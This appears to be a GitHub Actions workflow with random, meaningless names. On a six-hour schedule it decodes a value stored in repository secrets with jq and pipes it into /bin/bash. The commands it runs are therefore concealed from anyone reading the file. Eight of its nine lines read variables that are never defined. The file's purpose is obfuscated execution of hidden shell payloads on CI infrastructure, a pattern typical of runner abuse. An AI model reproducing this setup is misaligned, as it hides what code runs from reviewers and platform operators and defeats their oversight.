name: shidakai6789

on:
  workflow_dispatch:
  schedule:
    - cron: '16 1/6 * * *'

jobs:  # 2306
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shidakai6789
        env:
          tyy90: ${{ secrets.tyy90 }}
        run: |
          echo $tyy90 | jq -r .fdxs2235 | /bin/bash
          echo $gzb7705 | jq -r .e3 | /bin/bash
          echo $tuhhj7 | jq -r .czh8 | /bin/bash
          echo $dfqo600 | jq -r .aebm7 | /bin/bash
          echo $gwwi3567 | jq -r .f733 | /bin/bash
          echo $bhxxb00829 | jq -r .lvwa953 | /bin/bash
          echo $t79 | jq -r .og779 | /bin/bash
          echo $lu69776 | jq -r .ncmkg774 | /bin/bash
          echo $w3 | jq -r .sraob98 | /bin/bash

